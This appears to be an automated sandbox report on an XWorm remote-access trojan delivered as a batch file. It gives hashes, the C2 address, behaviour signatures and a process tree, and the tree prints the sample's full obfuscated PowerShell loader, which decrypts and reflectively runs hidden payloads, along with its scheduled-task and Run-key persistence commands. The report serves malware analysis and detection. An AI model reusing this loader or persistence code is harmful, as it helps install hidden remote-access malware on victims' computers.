Analysis
- max time kernel: 148s
- max time network: 94s
- platform: windows11-21h2_x64
- resource: win11-20240508-en
- resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 29-06-2024 16:06
- Static task: static1
- Behavioral task: behavioral1 (Sample: XClient.bat; Resource: win10-20240404-en)
- Behavioral task: behavioral2 (Sample: XClient.bat; Resource: win10v2004-20240508-en)
- Behavioral task: behavioral3 (Sample: XClient.bat; Resource: win11-20240508-en)
General
- Target: XClient.bat
- Size: 401KB
- MD5: ba91ec16f05697b52c5d28f1a250ec71
- SHA1: 02f0502d5270493a302e28c1df808bb29873c109
- SHA256: 886383676ce8cadc259cadd4de3ba03106f012e5084c739d2fdb826b7c2c4c8d
- SHA512: 5b43f4f65559ac9368e6f574e3231fdeff1c81e185a28c44d9e4151fe146298ce2949edf0e1b64724e4d00efc2f80f1517548ea6bc7d9558797bc94fe948001b
- SSDEEP: 12288:XsxR4y6qFoRRh8jDi8gZKLyJ3ToFQBpJ7W5x7B:XN9qFoRRCLmNBLsn
Malware Config
Extracted
- Family: xworm
- C2: paris-itself.gl.at.ply.gg:49485
- Install_directory: %Public%
- install_file: USB.exe
Signatures
- Detect Xworm Payload 1 IoCs
  Processes (resource | yara_rule): behavioral3/memory/4048-102-0x0000021F38E40000-0x0000021F38E58000-memory.dmp | family_xworm
- Blocklisted process makes network request 2 IoCs
  Processes (flow | pid | process): 2 | 4048 | powershell.exe; 4 | 4048 | powershell.exe
- Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
  Run Powershell and hide display window.
  Processes (pid | process): 1940 | powershell.exe; 3052 | powershell.exe; 4048 | powershell.exe
- Drops startup file 2 IoCs
  Processes (description | ioc | process):
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | powershell.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | powershell.exe
- Executes dropped EXE 1 IoCs
  Processes (pid | process): 1904 | svchost
- Adds Run key to start application 2 TTPs 1 IoCs
  Processes (description | ioc | process): Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Public\\svchost" | powershell.exe
- Looks up external IP address via web service 1 IoCs
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow | ioc): 1 | ip-api.com
- Drops file in System32 directory 1 IoCs
  Processes (description | ioc | process): File opened for modification | C:\Windows\System32\Tasks\svchost | svchost.exe
- Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).
- Delays execution with timeout.exe 1 IoCs
  Processes (pid | process): 4568 | timeout.exe
- Modifies data under HKEY_USERS 1 IoCs
  Processes (description | ioc | process): Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
- Modifies registry class 1 IoCs
  Processes (description | ioc | process): Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings | powershell.exe
- Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious behavior: EnumeratesProcesses 64 IoCs
  Processes (pid | process): 1940 | powershell.exe (2 entries); 3052 | powershell.exe (2 entries); 4048 | powershell.exe (all remaining entries, 64 in total)
- Suspicious use of AdjustPrivilegeToken 64 IoCs
  Processes (description | pid | process):
  Token: SeDebugPrivilege | 1940 | powershell.exe
  Token: SeDebugPrivilege | 3052 | powershell.exe
  Then, for 3052 | powershell.exe, the following token sequence repeated three times (the third pass ending after 35; 64 entries in total): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- Suspicious use of SetWindowsHookEx 1 IoCs
  Processes (pid | process): 4048 | powershell.exe
- Suspicious use of WriteProcessMemory 64 IoCs
  Processes (description | pid | process | target process), "(x2)" marking entries the report lists twice:
  PID 4912 wrote to memory of 5076 | 4912 | cmd.exe | cmd.exe (x2)
  PID 4912 wrote to memory of 1940 | 4912 | cmd.exe | powershell.exe (x2)
  PID 1940 wrote to memory of 3052 | 1940 | powershell.exe | powershell.exe (x2)
  PID 1940 wrote to memory of 4208 | 1940 | powershell.exe | WScript.exe (x2)
  PID 4208 wrote to memory of 4836 | 4208 | WScript.exe | cmd.exe (x2)
  PID 4836 wrote to memory of 2304 | 4836 | cmd.exe | cmd.exe (x2)
  PID 4836 wrote to memory of 4048 | 4836 | cmd.exe | powershell.exe (x2)
  PID 4048 wrote to memory of 3144 | 4048 | powershell.exe | Explorer.EXE
  PID 4048 wrote to memory of <target pid> | 4048 | powershell.exe | svchost.exe, one entry for each of the following target pids in order: 984, 1968, 2648, 1172, 2548, 3556, 752, 2836, 1724, 932, 1260, 1700, 2012, 1492, 700, 2668, 2076, 2268, 3572, 1276, 3440, 1852, 1788, 1072, 2252, 2640, 1056, 3416, 2036, 1444, 4788, 2028, 2808, 1820, 1620, 1412, 2788, 1604, 1800, 4360, 3960, 804, 1196, 2180, 992, 1188, 2760
  PID 4048 wrote to memory of 3612 | 4048 | powershell.exe | schtasks.exe (x2)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Windows\system32\svchost.exe -k DcomLaunch -p
- C:\Windows\system32\svchost.exe -k RPCSS -p
- C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
- C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  Signatures: Drops file in System32 directory
  - C:\Users\Public\svchost
    Signatures: Executes dropped EXE
- C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
- C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
- C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
- C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
- C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
- C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
- C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
- C:\Windows\system32\svchost.exe -k NetworkService -p
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
- C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
- C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
- C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
- C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
- C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
- C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
- C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
- C:\Windows\system32\svchost.exe -k NetworkService -p
- C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
- C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
- C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
- C:\Windows\Explorer.EXE
  - C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YnSWh2kl5il3EMjntzhV8DXjrMsXq1qvsxGC5bVHd4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OdoCVEiT8kRX1L6TbGv11A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zTNzi=New-Object System.IO.MemoryStream(,$param_var); $hXjuc=New-Object System.IO.MemoryStream; $naMQO=New-Object System.IO.Compression.GZipStream($zTNzi, [IO.Compression.CompressionMode]::Decompress); $naMQO.CopyTo($hXjuc); $naMQO.Dispose(); $zTNzi.Dispose(); $hXjuc.Dispose(); $hXjuc.ToArray();}function execute_function($param_var,$param2_var){ $plvam=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kLZRH=$plvam.EntryPoint; $kLZRH.Invoke($null, $param2_var);}$ZnpwU = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$host.UI.RawUI.WindowTitle = $ZnpwU;$zIJcx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ZnpwU).Split([Environment]::NewLine);foreach ($vIuJs in $zIJcx) { if ($vIuJs.StartsWith('KSgXqCUIyvjlHChvQmvc')) { $FzXsd=$vIuJs.Substring(20); break; }}$payloads_var=[string[]]$FzXsd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      Signatures: Command and Scripting Interpreter: PowerShell; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_87_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.vbs"
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.bat" "
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YnSWh2kl5il3EMjntzhV8DXjrMsXq1qvsxGC5bVHd4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OdoCVEiT8kRX1L6TbGv11A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zTNzi=New-Object System.IO.MemoryStream(,$param_var); $hXjuc=New-Object System.IO.MemoryStream; $naMQO=New-Object System.IO.Compression.GZipStream($zTNzi, [IO.Compression.CompressionMode]::Decompress); $naMQO.CopyTo($hXjuc); $naMQO.Dispose(); $zTNzi.Dispose(); $hXjuc.Dispose(); $hXjuc.ToArray();}function execute_function($param_var,$param2_var){ $plvam=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kLZRH=$plvam.EntryPoint; $kLZRH.Invoke($null, $param2_var);}$ZnpwU = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.bat';$host.UI.RawUI.WindowTitle = $ZnpwU;$zIJcx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ZnpwU).Split([Environment]::NewLine);foreach ($vIuJs in $zIJcx) { if ($vIuJs.StartsWith('KSgXqCUIyvjlHChvQmvc')) { $FzXsd=$vIuJs.Substring(20); break; }}$payloads_var=[string[]]$FzXsd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
          - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Drops startup file; Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
            - "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost"
              Signatures: Scheduled Task/Job: Scheduled Task
            - "C:\Windows\System32\schtasks.exe" /delete /f /tn "svchost"
            - C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA94B.tmp.bat""
              - timeout 3
                Signatures: Delays execution with timeout.exe
- C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
- C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
- C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
- C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
- C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
- C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
- C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
- C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
- C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  Signatures: Modifies data under HKEY_USERS
- C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Network
MITRE ATT&CK Matrix ATT&CK v13
- Execution
  - Command and Scripting Interpreter (1): PowerShell (1)
  - Scheduled Task/Job (1): Scheduled Task (1)
- Persistence
  - Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
  - Scheduled Task/Job (1): Scheduled Task (1)
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: df472dcddb36aa24247f8c8d8a517bd7
  SHA1: 6f54967355e507294cbc86662a6fbeedac9d7030
  SHA256: e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
  SHA512: 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  Filesize: 62KB
  MD5: e566632d8956997225be604d026c9b39
  SHA1: 94a9aade75fffc63ed71404b630eca41d3ce130e
  SHA256: b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
  SHA512: f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 1KB
  MD5: 3ec0d76d886b2f4b9f1e3da7ce9e2cd7
  SHA1: 68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea
  SHA256: 214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5
  SHA512: a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2cwk0mb3.x35.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- C:\Users\Admin\AppData\Local\Temp\tmpA94B.tmp.bat
  Filesize: 171B
  MD5: 7a40b3cbfe54feb87373b2f6f7f4e913
  SHA1: 21f3b1056685448191bd53a92e9f75cdafc1da08
  SHA256: 4357816375d060f0bd1568b460c946a825a88b965b38a88b7802930c2e0c5501
  SHA512: 40a3258506e41c7db56a0ad9de67520fae3960d86745eb6caedf2180b586c538ec5979461116ca95c1c730ba3a1be5d48f403a71d2759f85220bbc9242e99ae2
- C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.bat
  Filesize: 401KB
  MD5: ba91ec16f05697b52c5d28f1a250ec71
  SHA1: 02f0502d5270493a302e28c1df808bb29873c109
  SHA256: 886383676ce8cadc259cadd4de3ba03106f012e5084c739d2fdb826b7c2c4c8d
  SHA512: 5b43f4f65559ac9368e6f574e3231fdeff1c81e185a28c44d9e4151fe146298ce2949edf0e1b64724e4d00efc2f80f1517548ea6bc7d9558797bc94fe948001b
- C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.vbs
  Filesize: 123B
  MD5: 6a106b5df4530d40fd00bc8b806ebff6
  SHA1: fafee4fd7d92c876387e854764274f90ea6d2b38
  SHA256: 045ccfdbfabbdca68f2efaaa2eb1d73ee530fd30bc39f200df5f4a94cf152bac
  SHA512: e3ed771324cda75f70208e988177ec1f39e9f359f0fe1b771d267d73db41351e8f45a2cb42b9f0dc93349311e09d07fa44a132bb9eb40e8e9cb108ea24890552
- C:\Users\Public\svchost
  Filesize: 440KB
  MD5: 0e9ccd796e251916133392539572a374
  SHA1: eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
  SHA256: c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
  SHA512: e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
- memory/984-53-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)
- memory/1172-58-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)
- memory/1412-103-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)
- memory/1604-111-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)
- memory/1788-109-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)
- memory/1940-14-0x000001CCA67A0000-0x000001CCA67A8000-memory.dmp (Filesize: 32KB)
- memory/1940-9-0x000001CCA6750000-0x000001CCA6772000-memory.dmp (Filesize: 136KB)
- memory/1940-15-0x000001CCA6B70000-0x000001CCA6BBE000-memory.dmp (Filesize: 312KB)
- memory/1940-13-0x000001CCA6BC0000-0x000001CCA6C06000-memory.dmp (Filesize: 280KB)
- memory/1940-10-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmp (Filesize: 10.8MB)
- memory/1940-0-0x00007FFC12113000-0x00007FFC12115000-memory.dmp (Filesize: 8KB)
- memory/1940-139-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmp (Filesize: 10.8MB)
- memory/1940-12-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmp (Filesize: 10.8MB)
- memory/1940-11-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmp (Filesize: 10.8MB)
- memory/1968-57-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)
- memory/2076-107-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)
- memory/2268-110-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)
- memory/2548-60-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)
- memory/2648-54-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)
- memory/2668-108-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)
- memory/2788-104-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)
- memory/2836-106-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)
- memory/3052-17-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmp (Filesize: 10.8MB)
- memory/3052-30-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmp (Filesize: 10.8MB)
- memory/3052-27-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmp (Filesize: 10.8MB)
- memory/3052-26-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmp (Filesize: 10.8MB)
- memory/3144-52-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)
- memory/3144-47-0x0000000000930000-0x000000000095A000-memory.dmp (Filesize: 168KB)
- memory/3556-61-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)
- memory/4048-102-0x0000021F38E40000-0x0000021F38E58000-memory.dmp (Filesize: 96KB)
- memory/4360-105-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmp (Filesize: 64KB)